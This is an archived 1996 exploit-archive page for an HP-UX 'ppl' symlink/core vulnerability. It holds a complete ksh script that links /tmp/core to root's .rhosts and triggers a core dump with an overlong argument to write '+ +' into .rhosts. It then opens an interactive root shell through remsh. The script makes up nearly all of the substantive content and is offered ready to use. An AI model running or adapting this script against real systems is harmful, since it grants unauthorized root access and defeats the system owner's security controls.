Another hpux ppl bug by SOD

Summary
Description:standard symlink/core vulnerability
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable ppl, probably 9.x 10.x
Date:15 October 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/bin/ksh

# ppl exploit, second part - SOD 15Oct96
# not all buffer overruns need to force an address into the PC
# works on 10.X, too, oddly enough. - Script Junkie

#HOST='localhost'
#USER=`whoami`

HOST="+"
USER="+"

cd /tmp
rm core 2> /dev/null
ln -s ~root/.rhosts core
AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
STUFF=`echo "${AAA}\n${HOST} ${USER}"`
ppl -o "${STUFF}"
rm core
remsh localhost -l root sh -i


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault